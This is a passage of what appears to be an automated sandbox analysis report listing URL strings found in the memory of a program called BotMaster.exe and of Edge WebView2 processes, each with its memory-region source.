                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: BotMaster.exe, 0000001A.00000002.3730410251.00000000069E0000.00000004.00000020.00020000.00000000.sdmp, BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hao123.com.11818wz.com/?e
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xt.tiantianbannixue.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3692547371.00002DDC001B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zn728.tdg68.com
                  Source: msedgewebview2.exe, 0000001D.00000003.2436721589.0000021F32A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://117.0.2045.47
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://123.sogou.com/?
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://17roco.qq.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://360.qrfq25sg.xyz
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3692547371.00002DDC001B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://656a.com
                  Source: msedgewebview2.exe, 00000026.00000003.2532384549.00004B1801210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://_media_cache_v2_.whatsapp.com/$
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alekberg.net/privacy
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                  Source: msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/73080
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ausu.lol
                  Source: msedgewebview2.exe, 0000001D.00000002.3693237450.00002DDC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://azureedge.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3694431049.00002DDC003D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://baduk.hangame.com/?utm_source=baduk&utm_medium=icon&utm_campaign=shortcut
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.360.cn/saas/index.html
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.cloud.huawei.com.cn/pc
                  Source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://businesswhatsappsender.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.edog.designerapp.osi.office.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.int.designerapp.osi.office.net/
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2379480786.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2391697389.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393549936.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2379480786.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2391697389.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393549936.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryD
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryed
